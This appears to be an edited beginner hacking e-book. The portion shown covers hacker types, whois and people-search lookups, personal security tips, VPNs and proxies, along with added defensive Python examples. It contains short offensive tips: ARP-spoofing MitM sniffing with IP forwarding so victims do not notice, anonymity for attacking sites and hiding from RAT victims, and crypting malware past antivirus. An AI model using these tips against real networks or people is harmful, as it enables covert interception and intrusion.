
Level: Beginner

Penultimate Hackers
Ultimate hacking guide for beginners
Shubham Halle
TEAM IHA +
HackingTruth

INTRODUCTION
By Shubham Halle

The main objective of this e-book is to make you more secure!
Unless and until you know how you will be hacked, you won't be able to
secure yourself!
This is my first e-book on computer technology. I have included as much material
as possible that a beginner will find useful.
All the information shared in this e-book is actually a collection from very good blogs,
posts, video tutorials, etc., so it does not belong to me entirely.

Hope you all enjoy this book and share it!
Let me know if you have any suggestions or reviews!

Shubham Halle
Facebook : http://www.facebook.com/halleshubham
Blog : http://www.hackingtruth.org
Eathen Hunt
https://www.facebook.com/AkkaProgrammer

LEGAL DISCLAIMER

Any proceedings or activities related to the material contained within this
volume are exclusively your liability. Misuse of the information in this book can
result in criminal charges being brought against the persons in question. The
authors and reviewers will not be held responsible in the event that charges are
brought against any individual for misusing the information in this book to break
the law. This book contains material and resources that can be potentially
destructive or dangerous. If you do not fully understand something in this book,
don't study this book.
Please refer to the laws and acts of your state/region/province/territory or
country before accessing, using, or in any other way utilizing these resources.
These materials and resources are for educational and research purposes only. Do
not attempt to violate the law with anything enclosed herein. If that is your
intention, then leave now. Neither the writer of this book, the reviewers, the
publisher, nor anyone else affiliated in any way accepts any responsibility for
your proceedings, actions or trials.



ACKNOWLEDGEMENT
Any successful work owes thanks to many.

TABLE OF CONTENTS
A. Introduction
  a. Where and how to start (p. 7)
    1. Using a computer (Linux, configuration and so on) (p. 7)
    2. Networking (protocols and how everything works) (p. 8)
    3. Software (developing and reversing) (p. 8)
    4. Hardware (how your CPU works and so on) (p. 9)
  b. Using this book (p. 10)
  c. Become a PARANOID (p. 11)
    1. History: HACKERS (p. 11)
    2. Some basics about websites (p. 12)
    3. Everybody knows you: ANONYMITY (p. 13)
B. Protect yourself (famous and basic attacks) (p. 19)
C. Anonymity
  a. What is anonymity? (p. 21)
  b. Methods
    1. Using a Virtual Private Network [VPN] (p. 22)
    2. Using SOCKS and HTTP proxies (p. 22)
    3. MAC address spoofing (p. 23)
    4. Hide your MAC address without any software (p. 24)
D. Secure your HACKING
  a. How hackers get caught (p. 26)
  b. Hiding yourself as a HACKER (p. 26)
    i. Clearing system logs (p. 26)
E. Facebook and other tricks!
  a. Forgot to log out of a Facebook account on someone else's computer? (p. 27)
  b. Create a fake Facebook conversation! (p. 28)
  c. Online chat trick! (p. 29)
  d. How to type symbols with the keyboard (p. 30)
  e. How to remove Deep Freeze without any software (p. 31)
  f. Funny virus that continuously opens the CD drive (p. 32)
  g. Delmes batch-file virus generator (p. 34)
  h. Compress 1 GB of data into 10 MB (p. 35)
  i. Change pen drive icon (p. 35)
  j. Keep your laptop turned on while the lid is closed (p. 36)
  k. Access restricted websites from college computers (p. 37)
  l. Block an enemy's SIM card (p. 40)
  m. Changing icons (p. 41)
  n. Things that Microsoft couldn't explain (p. 43)

  o. How to make a flip 3D icon in the taskbar (p. 45)
  p. Lock files using the recycle bin (p. 46)
  q. Set a video as your desktop background (p. 47)
F. Generalized account hacking
  a. Phishing (p. 48)
  b. Key logging (p. 51)
  c. Tab napping (p. 58)
  d. Cookie stealing (p. 61)
  e. Bypass Windows 7, XP and Vista password screens (p. 66)
G. Legendary DDOS
  a. What is a DDOS attack? (p. 67)
  b. DDOS attack basics (p. 68)
  c. Manual DDOS attack (p. 71)
  d. DDOS attack with LOIC (p. 71)
  e. DDOS attack with JANIDOS (p. 72)
H. Beginning with penetration testing platforms (p. 73)
  a. About (p. 74)
  b. Installation (p. 75)
    i. Backtrack
      1. Plain install (p. 76)
      2. Dual boot (p. 80)
    ii. Kali Linux
      1. Plain install (p. 86)
      2. Dual boot (p. 93)
    iii. Make one for yourself! (p. 108)
  c. First things you must do (p. 113)
  d. Basic Linux commands (p. 116)
  e. Exploiting a remote PC (easy level) (p. 132)
  f. Social Engineering Toolkit (p. 140)
  g. Wireless hacking
    i. WEP (p. 141)
    ii. WPA/WPA2 (p. 149)
  h. Metasploit tutorials by Shehab Imam (p. 155)
    i. Metasploit introduction (p. 155)
    ii. Information gathering tool: Nmap (p. 156)
    iii. Information gathering tool: Nessus (p. 157)
    iv. Exploitation (p. 158)
    v. Creating an executable payload (p. 159)
    vi. Meterpreter (p. 161)
    vii. DNS spoofing (p. 163)

    viii. Java signed applet (p. 165)
I. Website hacking (p. 166)
  a. Scanning a website (p. 167)
    i. Uniscan (p. 167)
    ii. Nmap (p. 170)
  b. Hacking a Joomla-based website (p. 182)
  c. Hacking a WordPress blog (p. 180)
  d. SQLi using Havij (smoothest hacking ever) (p. 175)
  e. XSS (cross-site scripting) (p. 184)
  f. Hack with basic HTML coding (p. 188)
  g. Spaw vulnerability (p. 189)
  h. Uploading your shell with Tamper Data (p. 191)
  i. Local File Inclusion attack (p. 192)


INTRODUCTION

A lot of people ask "How do I learn hacking?", "Where do I start?", "How do I
become a hacker?" and so on. I have answered the question a million times. Now we
can all just give them this link to my blog. This is my opinion about everything;
others might think about it in a different way. Take it or leave it.

WHAT IS HACKING?

Hacking is a hobby. There are many ways of hacking: some break security
systems, some reverse code. In my opinion everything has to do with hacking. If you
want to become a hacker, you have to get some knowledge in computer science
and love to play around with it. That's basically everything a hacker needs.

WHAT DO I HAVE TO LEARN?

This really depends on what you want to achieve. For example: "I want to learn
to break into systems with the tools out there and I don't want to learn a programming
language." To me you are no hacker then, but then you just need to learn Metasploit
and co.
There are some main topics that, in my opinion, are important.
USING A COMPUTER

Most people who read my blog already have this knowledge. If you don't, my
advice is to install Linux and play around with it. Configure an Apache server or
something like that. Just play around until you feel comfortable with it. Compile some
programs and so on. If you are able to compile your Linux kernel and use it (maybe
with a configuration optimized for your PC), this topic is done for you. You
don't need to know how to compile a kernel; just feeling comfortable with Linux should
prove you know how to use your computer.
The other topics can be learned in parallel. There is no need to focus on one topic.

NETWORKING
In my opinion everyone needs to know how to set up a network. Learn how to
calculate a subnet mask and so on. This should be easy; just read something about it.
Google helps a lot here.
Learn how everything works. Examples are the ARP protocol, the TCP/IP protocol and
how WLAN works. With this knowledge you can have a lot of fun. You should be able
to run a MitM attack between a router and a PC on the same LAN, and with that setup
sniffing is possible. In my opinion this is enough knowledge here, but depending on
your needs you can learn more. Google these topics or interesting tools:

pcap (for developers: if you know or want to learn software development, this is
interesting for you)
arpspoof (dsniff package); remember to enable IP forwarding on your own machine,
otherwise the victim loses connectivity and notices immediately
fragrouter (-B1, if I remember right, does plain forwarding so the network doesn't
break when you hook in there)
dsniff tools etc.

All the tools you need here are on the net, and knowing a network can be quite funny
at a LAN party. Guys, never, really never ever, log in to private pages at a LAN party or
anything like it. Public networks are public for a network hacker.
SOFTWARE

Before learning reversing you have to learn software development. I
recommend every so-called hacker to have at least basic C knowledge. People
always ask which language they have to learn. The question is moot. If you know
C, which is a procedural language, very well and want to do procedural programming
in VB, the only thing that differs is the syntax. I very often read that there are so many
differences and that just a handful of people know assembler. This is plain nonsense. I
know more than a handful of people who reverse code (which means reading assembler).
Another rumour I often hear from wannabe hackers is that you use absolute addresses
while developing in assembler while the compiler creates relative addresses, and that this
is why nearly no one knows assembler. That would mean knowing assembler needs basic
addition and subtraction. Yeah, an assembler developer can't do that.

I recommend learning these languages in this order:
C (procedural programming)
C++ (object-oriented programming)
Assembler (low-level programming)

ASSEMBLER
The masterpiece. I know no one who really develops software with it, except when
forced to. Knowing this language gives you the following advantages:
HARDWARE
You should know how a CPU works and how to read/write a circuit from a truth
table or formula. That's the basics, as far as I know. If you want to go deeper into this topic,
microcontrollers and/or FPGAs should be your subject. Learning this topic can be
expensive. I recommend learning the software part next, or better before this topic:
going deep into hardware engineering needs software.

Conclusions:

There is no way to give you a numbered list of what to do/learn to be a hacker.
Hacker just means that you know computer science and want to experiment with
that knowledge. If I had to start from the beginning I would do it this way:
Install Linux and play around with it
Set up my network in Linux so I get internet
Learn C/C++ with a book and all its examples
Go to a LAN party or hotspot and play around with the networking tools (don't
do bad things: if you sniff a password, be happy, you made it, but don't use it for
bad things! You want to be a hacker, not a cracker)
Play around with some hardware and develop software

Some years later you should have the knowledge to go on alone from here.


I hope this helps some people to make the right decisions.
HOW TO START
This e-book will serve as a beginner's handbook for starting out in hacking!
USING THIS BOOK

1. As the main objective of this e-book is to make you more secure, you
can use this book to make yourself more secure or also to make others aware
of their security!

2. This book may contain information that can be used for illegal purposes,
but I tell you myself that this may lead you to JAIL, and instead of learning
things you will waste your time in JAIL.

3. So, to avoid such things, I have provided side information about testing
a trick or a hack safely!


INTRODUCTION
BECOME A PARANOID

Here I'm giving out some information that will help you find out a lot about
someone in a few seconds.

1) HISTORY - HACKERS

I will explain briefly the types of hackers that are out there, for the sake
of academic knowledge. These descriptions are not in depth; instead they are meant
to touch the subject lightly and educate those who are unaware of these titles in
the cyber world.
I. BLACK HAT HACKERS
- These are the most infamous hackers there are. These are the guys you hear
about on the news for committing crimes. Their purpose is to gain information and
use it for their own needs. They could be anyone.
- Black Hats tend to be professionals at what they do and are extremely well
informed on everything related to the cyber world and crime.
- Black Hats tend to be educated people who have worked many years to
accumulate all the knowledge they hold. They are not the kid who uses "hacking
tools" to scare his gaming buddies online.
- Black Hats are the image typically portrayed in movies.


II. WHITE HAT HACKERS

These are the lesser-known hackers, simply because they do the clean-up
work that goes on behind the scenes, cleaning up the messes left by Black Hat hackers.
- White Hats are the heroes of the cyber world. They fight crime using their
hacking knowledge to patch exploits on systems and ensure that your information does
not get leaked or easily acquired by any Black Hat.
- White Hats are professionals at what they do. They have as much knowledge
as Black Hats, but use their skills to fight crime rather than aid it.

III. GRAY HAT HACKERS

- These are the somewhat-known hackers, simply because it is
unpredictable what their actions might turn into. They are known as "Gray Hats"
because gray is the mixture of white and black.
- Gray Hats are essentially neutral in what they do. They might decide to do
what's right even if some other entity tells them it's wrong, or it could be
vice versa.
For example, a Black Hat steals bank information and leaks it on the internet.
A Gray Hat could decide either to use the information OR to let the owners,
authorities or the companies know of the exposure.

2) WEBSITE OWNERS
Websites: there are millions of them around the world in all languages. You can
keep yourself entertained on them, or you can become smarter reading potentially useful
information, as you are doing now.
Do you ever wonder "Who owns this website?" or "How can I find out who owns
it?"
I decided to include this topic here since more and more people decide to
pay for hosting services to have their very own website, either for personal use or
some sort of business.

12

Well, unlike in the real world, where you fill out papers and they get stacked or
hidden in some compartment that a random person cannot access,
websites expose your information unknowingly. Maybe not the websites themselves,
but the companies that provide the domain registration and hosting services.
I will use the website "HackForums.net" as an example to show what I'm talking
about.
There is something known as a "whois" lookup that essentially tells you who registered
the domain name.
You can easily Google "whois domain" and get a huge list of websites that let
you whois either a domain or an IP address to find its location.
My favorite website for whois is: http://whois.domaintools.com/
Now, if we do a whois on HackForums.net, here's what we get:
Domain Name: HACKFORUMS.NET
Registrar: MONIKER
Registrant [2341726]: Moniker Privacy Services Moniker Privacy Services
20 SW 27th Ave., Suite 201, Pompano Beach, FL 33069, US
Administrative Contact [2341726]:
Moniker Privacy Services
Moniker Privacy Services, 20 SW 27th Ave. Suite 201, Pompano Beach, FL 33069, US
Phone: +1.9549848445, Fax: +1.9549699155
Billing Contact [2341726]:
Moniker Privacy Services
Moniker Privacy Services, 20 SW 27th Ave. Suite 201, Pompano Beach, FL 33069, US
Phone: +1.9549848445, Fax: +1.9549699155

Technical Contact [2341726]:
Moniker Privacy Services
Moniker Privacy Services, 20 SW 27th Ave. Suite 201, Pompano Beach, FL 33069, US
Phone: +1.9549848445, Fax: +1.9549699155

Domain servers in listed order:
NS1.DALLAS-IDC.COM
NS2.DALLAS-IDC.COM
NS1.ZANMO.COM 69.162.82.250
Record created on: 2005-09-27 14:18:41.0
Database last updated on: 2010-11-29 02:16:59.78
Domain Expires on: 2011-09-27 14:18:41.0

As you can see, it exposes a lot of information that you wouldn't want strangers
to get hold of and then sell for their own good.
Common hacking forums and websites are registered as a "private" domain, so
no real information about the owner is shown. Instead, it displays the information of
the company providing the privacy service for the domain or hosting.
This is also how you can contact a company if you want to report a website with
disgusting content such as child pornography.
I'm not going to whois a person's website, since it would be against the rules
to expose personal information about anyone, but I believe you get the idea of
what can be done to discover information such as address, name, phone number, fax
number and more using nothing but a website name.
Experienced website administrators should always use private registration to
avoid exposing information to the public as much as possible. If you have a website,
whois it yourself and find out whether you are exposed or not. If you are, call the
company you registered your domain with and request your domain to be made private.
They might require a fee of around $7 extra a year, but it's worth it knowing that you're
not exposed. (Many registrars today redact personal contact data by default, but
check rather than assume.)
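The "whois it yourself" check above can be scripted. This is an added example, not code from the book: it parses a WHOIS record into the fields that matter for exposure (registrant, registrar, name servers, phone numbers, expiry) and flags whether the registrant is a privacy/proxy service rather than a person. The embedded record is an abridged copy of the HackForums.net output quoted above; `query_whois()` shows the live lookup over TCP port 43 (RFC 3912), and the server name `whois.verisign-grs.com`, the registry WHOIS server for .com and .net, is an assumption for that function only, which is never called offline.

```python
"""Parse a WHOIS record and report what it exposes about the registrant.

Added example (not from the book). SAMPLE_WHOIS is abridged from the record
quoted in the text; the live query function is provided but not run here.
"""
import re
import socket

SAMPLE_WHOIS = """\
Domain Name: HACKFORUMS.NET
Registrar: MONIKER
Registrant [2341726]: Moniker Privacy Services Moniker Privacy Services
20 SW 27th Ave., Suite 201, Pompano Beach, FL 33069, US
Administrative Contact [2341726]:
Moniker Privacy Services
Moniker Privacy Services, 20 SW 27th Ave. Suite 201, Pompano Beach, FL 33069, US
Phone: +1.9549848445, Fax: +1.9549699155
Domain servers in listed order:
NS1.DALLAS-IDC.COM
NS2.DALLAS-IDC.COM
NS1.ZANMO.COM 69.162.82.250
Record created on: 2005-09-27 14:18:41.0
Domain Expires on: 2011-09-27 14:18:41.0
"""

# Phrases that identify a registrar privacy/proxy service rather than a person.
PRIVACY_MARKERS = ("privacy", "proxy", "whoisguard", "redacted for privacy")


def query_whois(domain, server="whois.verisign-grs.com", timeout=10):
    """Fetch a live record: RFC 3912 is just 'domain\\r\\n' to port 43.
    (server name is an assumption; pick the registry server for the TLD)"""
    with socket.create_connection((server, 43), timeout=timeout) as s:
        s.sendall(domain.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def parse_whois(text):
    """Extract the fields an exposure check needs from free-form WHOIS text."""
    fields = {"registrant": None, "registrar": None, "nameservers": [],
              "phones": [], "expires": None}
    in_ns = False
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if in_ns:  # name-server block: one hostname per line until a non-host line
            if re.match(r"^[A-Za-z0-9.-]+\.[A-Za-z]{2,}(\s|$)", line):
                fields["nameservers"].append(line.split()[0].lower())
                continue
            in_ns = False
        key, _, value = line.partition(":")
        key_l = key.lower()
        if key_l.startswith("registrant"):
            fields["registrant"] = value.strip()
        elif key_l == "registrar":
            fields["registrar"] = value.strip()
        elif key_l.startswith("domain servers"):
            in_ns = True
        elif key_l.startswith("domain expires"):
            fields["expires"] = value.strip()
        fields["phones"] += re.findall(r"\+\d+\.\d+", line)  # +1.9549848445 style
    return fields


def exposure_report(text):
    """Return (is_private, summary): is_private is False when a real name shows."""
    f = parse_whois(text)
    registrant = (f["registrant"] or "").lower()
    is_private = any(marker in registrant for marker in PRIVACY_MARKERS)
    summary = (f"registrant={f['registrant']!r} private={is_private} "
               f"nameservers={f['nameservers']} phones={sorted(set(f['phones']))}")
    return is_private, summary


if __name__ == "__main__":
    print(exposure_report(SAMPLE_WHOIS)[1])
```

The registrant line is the one that matters: a privacy service there means a stranger gets the registrar's address and phone, not yours; a real name there means you are the exposed owner the text warns about.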

YOU CAN ALSO FIND OUT THE ISP OR HOSTING COMPANY BY RESOLVING THE NAME TO AN IP.

Example:
Open Command Prompt and type "ping hackforums.net"; the reply shows the IP the name
resolves to ("nslookup hackforums.net" gives the same answer without sending a single
packet to the host). Once you have that IP, you can use:
http://iplocation.net/
to tell you roughly where the servers are located and which company operates the
network the IP belongs to.
http://iplocation.net/ can also be used to locate a person from their IP, but IP
geolocation only names the ISP and usually the city or region, never a street address,
and a VPN or proxy changes the answer completely.

EVERYBODY KNOWS YOU!
*YOUR NAME
Your name is as unique as you are. Your parents/guardians named you, and
that's what makes you you. Your name can be your worst enemy when you are
online, as it can be used to expose so much information about you that
you could be blackmailed. Where should you ever use your real name online?
NEVER. Why? Because using your name alone, anyone can find out where you live
within a matter of seconds.
Websites such as:
http://com.lullar.com/
http://www.pipl.com/email/
http://www.spokeo.com/
http://www.emailfinder.com/
http://www.411.com/
http://www.ask.com/
http://www.bebo.com/
http://www.facebook.com/
http://www.flickr.com/
http://www.ip-adress.com/ipaddresstolocation/
http://www.myspace.com/
http://www.myyearbook.com/
http://www.searchenginez.com/findpeople.html
http://www.skipease.com/
http://www.sonico.com/
http://www.spock.com/
http://www.twitter.com/
http://www.usatrace.com/
http://www.whitepages.com/
http://www.whois.com/
http://www.whois.net/
http://www.wink.com/
http://www.youtube.com/
http://www.zabasearch.com/
http://www.zoominfo.com/

make it extremely easy to search names, e-mails, etc. to dig up information about
whoever you want. There are more websites I personally use to dig up
information about people, but I will not mention them, since I do not want the news
stations going crazy over a new rage of identity exposers.

* YOUR E-MAIL

Your e-mail, the one you use to check on your everyday business or activities
online, the one you rely on to deliver things to you safely.
The question is, are you using it safely? Probably not, or at least I hope you
are.
The e-mail problem is an easy fix, since all it takes is common sense. If you have
various accounts such as social networks, have an e-mail specifically for messing
around. If you have accounts for serious business such as your PayPal, bank, etc.,
have an e-mail that only you have access to and that is different from your regular
"messing around" e-mail. If you work for a company or have service from an ISP,
avoid using their e-mail services to register on important websites where your money
is handled, such as PayPal, AlertMoney, banks, etc.
Why?
Why?
Because they have been known to get hacked, leaving all your information
exposed for hackers to gorge on. Instead, I would recommend the big
providers such as Yahoo, Hotmail or Gmail, since they have dedicated security
teams and are up 24/7 any time of the year; turn on two-factor authentication
wherever the provider offers it.
Not much to say on that; just have different e-mails for different activities as a
security measure. Not only that, but also have different passwords that require
extensive typing with various complicated symbols, such as:
you%(3cool
That above is a ridiculous example, but I believe you get the idea.
You know what hackers love most? Not having to do much work and having
everything laid out for them, easy for the taking. For example, if you are infected with a
KEYLOGGER, a hacker would love to have one e-mail that gives access to everything.
So this gives you an idea why you should have a variety at all times, with up-to-date
recovery information, to ensure that you can retrieve an account in case it gets stolen.

* WHAT YOU SIGN UP TO

Ever wondered why you get so much spam e-mail? Well, it's simple. It's
because e-mail collectors acquire a list of e-mails which they can mass-mail
with spam. Just as I mentioned earlier, have an e-mail for messing around and
e-mails for serious business. Avoid using one e-mail for all activities, as this will only
clog your inbox with useless e-mails that steal your valuable time. There are many
websites which sell their database of e-mails to spammers behind the scenes for a
certain amount of money, or the collectors themselves set traps around the
internet, such as phishing, to acquire a list of e-mails to spam.
Avoid registering on websites for products and random useless subjects
that promise to pay you money for signing up or trying their products.
Seems like common sense to me, but it's good to know.

* INFORMATION YOU EXPOSE UNKNOWINGLY

Well, I hope I have given you a good idea of how easily information can be
acquired using the internet. Privacy does not exist anymore on the internet. If you
use social networks, keep your information concealed from the public as much as
possible and do not expose valuable information such as birthday, location or
name, to keep yourself as underground as possible.
You have to consider that information could be leaked physically or
electronically as well.
Keep yourself up to date and informed, to know whether a company you use has
been breached or not.
As they say, Google is your friend. Use it when you need it.

HOW CAN YOU PROTECT YOURSELF?

KEEPING YOU SAFE

This is probably the most important part of the tutorial, as this is where most
incidents occur, due to infections or traps.
Infections or traps range from:
-RATs (Remote Access Trojans), which essentially give an attacker complete control of your
computer.
-Keyloggers, which keep a log of every key you ever press on your keyboard.
-Phishing, which records what you manually type into a fake website
imitating the original website.
-And more, but those above are the most common.

Around 90% of malware on the internet was written to infect Windows operating
systems. I got that number from PC World about a year ago; forgive me if it's incorrect
now. Anyway, assuming that you run Windows, you are at the highest
risk of getting targeted or infected.
You will want to keep your computer clean and secured with the
proper tools. All the tools below are among the best and are all free. They are probably
better than paid security software.
How do I know this? Well, there are websites where you can scan malware after
you crypt it (making it undetectable) to check that it is not detected by
any anti-virus. Avira is the one that people always have a hard time bypassing,
so I can safely say that it's the best, from my personal experience of crypting and
scanning.
Download and install all the tools below and I can assure you that your
computer will be far better protected than it is now. Get the free
versions.
1.http://www.malwarebytes.org/
2.http://personalfirewall.comodo.com/
3. KeyScrambler Pro 2.7: follow the instructions on that link on how to get it for
free. This software encrypts your keystrokes on their way to the browser, so a
keylogger hooking the keyboard sees only garbage.
4. If you use Firefox, get this:
http://www.eff.org/https-everywhere
It rewrites your requests to https:// instead of http:// on sites that support it, which
makes you more secure as well (it cannot add encryption to a site that offers none).
5. FireShepherd
A small console program that floods the nearby wireless network with packets
designed to crash FireSheep, effectively shutting down nearby FireSheep instances
every 0.5 s or so, protecting you and the people around you from most people
using FireSheep. http://notendur.hi.is/~gas15/FireShepherd/
The program kills the current version of FireSheep running nearby, but you are
still exposed to every other session-hijacking method. Do not do anything over an
untrusted network that you could not share with everyone.
-Know that this is only a temporary workaround for the FireSheep problem, created
to give people a chance to protect themselves and those around them from the
current threat, while the weakness FireSheep exposed (session cookies sent over
plain HTTP) is being fixed by the websites themselves.
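What FireSheep actually stole was a session cookie that the website allowed the browser to send over plain HTTP. The check below is an added example, not code from the book or from FireShepherd: it parses the Set-Cookie headers of a raw HTTP response and reports cookies that lack the Secure flag (and, for session-looking cookies, HttpOnly and SameSite), then runs over two constructed responses, a 2010-style weak one and its hardened form. The cookie names, values and the `sessionid` naming heuristic are assumptions for the example.

```python
"""Audit Set-Cookie headers for the weakness Firesheep exploited.

Added example (not from the book). Both responses are constructed samples,
not captures from any real site.
"""

# Constructed: a session cookie with no flags, usable over plain http://
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: sessionid=3f9a2c; Path=/\r\n"
    "Set-Cookie: theme=dark\r\n"
    "\r\n"
)

# Constructed: the hardened version of the same response
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Strict-Transport-Security: max-age=31536000\r\n"
    "Set-Cookie: sessionid=3f9a2c; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "Set-Cookie: theme=dark; Secure\r\n"
    "\r\n"
)

# Heuristic (assumption): cookie names containing these are session cookies.
SESSION_HINTS = ("sess", "sid", "auth", "token", "login")


def parse_set_cookies(raw_response):
    """Return [(name, attrs)] for every Set-Cookie header in the response head.

    attrs maps lower-cased attribute names to their value, or True for flag
    attributes such as Secure and HttpOnly.
    """
    head = raw_response.split("\r\n\r\n", 1)[0]
    cookies = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].split("=", 1)[0].strip()
        attrs = {}
        for part in parts[1:]:
            key, has_value, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip() if has_value else True
        cookies.append((cookie_name, attrs))
    return cookies


def audit_cookies(raw_response):
    """Return findings; a session cookie without Secure is what Firesheep stole."""
    findings = []
    for name, attrs in parse_set_cookies(raw_response):
        is_session = any(hint in name.lower() for hint in SESSION_HINTS)
        if "secure" not in attrs:
            severity = "HIGH" if is_session else "LOW"
            findings.append(f"{severity}: {name} lacks Secure (sent over plain HTTP, sniffable)")
        if is_session and "httponly" not in attrs:
            findings.append(f"MEDIUM: {name} lacks HttpOnly (readable by injected script)")
        if is_session and "samesite" not in attrs:
            findings.append(f"LOW: {name} lacks SameSite (sent on cross-site requests)")
    return findings


if __name__ == "__main__":
    for label, response in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_cookies(response) or ["no findings"])
```

Run it against a real site with the output of `curl -si https://example.net/` (a name used only as a placeholder here); if the login cookie comes back without Secure, no amount of FireShepherd packet flooding fixes that site.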
The other option is using a different operating system that has a lower chance
of being targeted. You don't have to spend tons of money on Apple
computers; instead you can get a free operating system from the Linux distributions.
The easiest to use and most similar to Windows in looks is Ubuntu. At the time of
writing you could install Ubuntu as a normal program on Windows (the Wubi installer)
and, after a restart, choose Ubuntu or Windows at boot; current releases no longer ship
Wubi, so use a normal dual-boot or a virtual machine instead.


ANONYMITY
WHAT IS ANONYMITY?

The act of keeping your identity hidden online by using connection methods and
encryption methods, to make yourself hard to trace for a person, website, company,
school or whatever else you are doing/connecting to.

USES OF ANONYMITY:

I. Stay hidden when attacking a website or scanning it for vulnerabilities.
II. Keep your browsing history/activity hidden when at work, school, the library or
even the family computer.
III. Keep your IP (Internet Protocol address) hidden from victims of a RAT
(Remote Administration Tool) or a botnet.


METHODS

I. Using a Virtual Private Network [VPN]
VPN is the acronym for Virtual Private Network: a server you connect to over an
encrypted tunnel, so that all your traffic leaves the VPN server's network instead of
your own. VPNs encrypt the connection between you and the VPN server and hide
your real IP from websites and people on the other end. They do not make you
untraceable: the VPN provider sees your real IP and your traffic, and whether that can
be traced back to you depends on what the provider logs and hands over.
List of free VPNs worth looking at (google them!):
CyberGhost VPN
proXPN
Hotspot Shield
(OpenVPN, also often listed here, is the open-source VPN software many of these
services run on, not a service by itself; you can use it to run your own server.)

II. Using SOCKS and HTTP proxies

WHAT IS SOCKS 4/5?

SOCKS is an internet protocol that relays TCP connections (and, in SOCKS5, UDP)
between a client and a server through a proxy server; the proxy does not care what
application protocol runs inside. The SOCKS protocol has a designated port, 1080,
but is not limited to that port. SOCKS5 adds authentication and lets the client send a
hostname so that the proxy does the DNS lookup; SOCKS4 takes only an IP address
(the SOCKS4a extension added hostnames), so your own machine still does the lookup.
SOCKS will let you get past a network firewall, usually at schools or workplaces, that
blocks the browsing you are allowed to do. It only hides the destination from the local
filter: the proxy operator sees everything, and unencrypted traffic stays unencrypted.

WHAT IS AN HTTP PROXY?

An HTTP (Hypertext Transfer Protocol) proxy is similar to a SOCKS5 proxy, except
that it speaks HTTP instead of the SOCKS protocol: it understands the requests it
forwards (and tunnels HTTPS with a CONNECT request). When a browser is configured
with an HTTP proxy, it sends every request through the proxy server, which bypasses
destination-based blocking on the LAN (Local Area Network).
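To see what a SOCKS proxy actually learns about you, here is the SOCKS5 CONNECT exchange (RFC 1928) with both sides written out. This is an added example, not code from the book or from any proxy product: it builds and parses the greeting, the CONNECT request and the reply, then runs them through an in-memory fake proxy that, like a school or workplace proxy, only allows ports 80 and 443. The bound address 203.0.113.7 (a documentation prefix), the port policy and the host names are assumptions; no network connection is made.

```python
"""SOCKS5 (RFC 1928) CONNECT handshake, both sides, in memory.

Added example (not from the book). Shows why a client should hand the proxy
a hostname (ATYP 0x03) instead of an IP: with ATYP 0x01 the DNS lookup
already happened from your real address before the proxy saw anything.
"""
import socket
import struct

SOCKS_VERSION = 0x05
NO_AUTH, NO_ACCEPTABLE = 0x00, 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN = 0x01, 0x03
REP_SUCCESS, REP_DENIED = 0x00, 0x02


# ---- client side -----------------------------------------------------------
def build_greeting(methods=(NO_AUTH,)):
    """VER | NMETHODS | METHODS..."""
    return bytes([SOCKS_VERSION, len(methods), *methods])


def build_connect(host, port):
    """VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT; hostnames go as ATYP 0x03."""
    try:
        body = bytes([ATYP_IPV4]) + socket.inet_aton(host)   # dotted quad given
    except OSError:                                          # not an IPv4 literal
        name = host.encode("idna")
        if len(name) > 255:
            raise ValueError("hostname too long for SOCKS5")
        body = bytes([ATYP_DOMAIN, len(name)]) + name
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + body + struct.pack("!H", port)


def _parse_address(data):
    """Shared decoder for ATYP | ADDR | PORT; returns (host, port)."""
    atyp = data[0]
    if atyp == ATYP_IPV4:
        host, rest = socket.inet_ntoa(data[1:5]), data[5:]
    elif atyp == ATYP_DOMAIN:
        n = data[1]
        host, rest = data[2:2 + n].decode("idna"), data[2 + n:]
    else:
        raise ValueError("unsupported address type %#x" % atyp)
    return host, struct.unpack("!H", rest[:2])[0]


def parse_reply(data):
    """Return (rep, bound_host, bound_port) from the proxy's reply."""
    if data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply")
    host, port = _parse_address(data[3:])
    return data[1], host, port


# ---- proxy side ------------------------------------------------------------
def parse_greeting(data):
    if data[0] != SOCKS_VERSION or len(data) != 2 + data[1]:
        raise ValueError("malformed greeting")
    return list(data[2:])


def parse_connect(data):
    """Return (cmd, host, port): everything the proxy learns about the request."""
    if data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 request")
    host, port = _parse_address(data[3:])
    return data[1], host, port


def build_reply(rep, bound_ip="0.0.0.0", bound_port=0):
    return (bytes([SOCKS_VERSION, rep, 0x00, ATYP_IPV4])
            + socket.inet_aton(bound_ip) + struct.pack("!H", bound_port))


def fake_proxy_exchange(host, port, allowed_ports=(80, 443)):
    """Walk one CONNECT through an in-memory proxy.

    Returns ((host, port) as seen by the proxy, parsed reply for the client).
    The proxy denies ports outside allowed_ports (policy is an assumption).
    """
    methods = parse_greeting(build_greeting())
    chosen = NO_AUTH if NO_AUTH in methods else NO_ACCEPTABLE
    assert chosen == NO_AUTH, "client offered no acceptable method"
    cmd, seen_host, seen_port = parse_connect(build_connect(host, port))
    ok = cmd == CMD_CONNECT and seen_port in allowed_ports
    reply = build_reply(REP_SUCCESS if ok else REP_DENIED, "203.0.113.7", 40000 if ok else 0)
    return (seen_host, seen_port), parse_reply(reply)


if __name__ == "__main__":
    print(fake_proxy_exchange("example.net", 443))    # allowed, proxy resolves the name
    print(fake_proxy_exchange("93.184.216.34", 22))   # denied, and the IP was already resolved locally
```

Browsers expose the difference as a setting: Firefox's "Proxy DNS when using SOCKS v5" is exactly the ATYP 0x03 choice above; without it your resolver still logs every site you visit.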



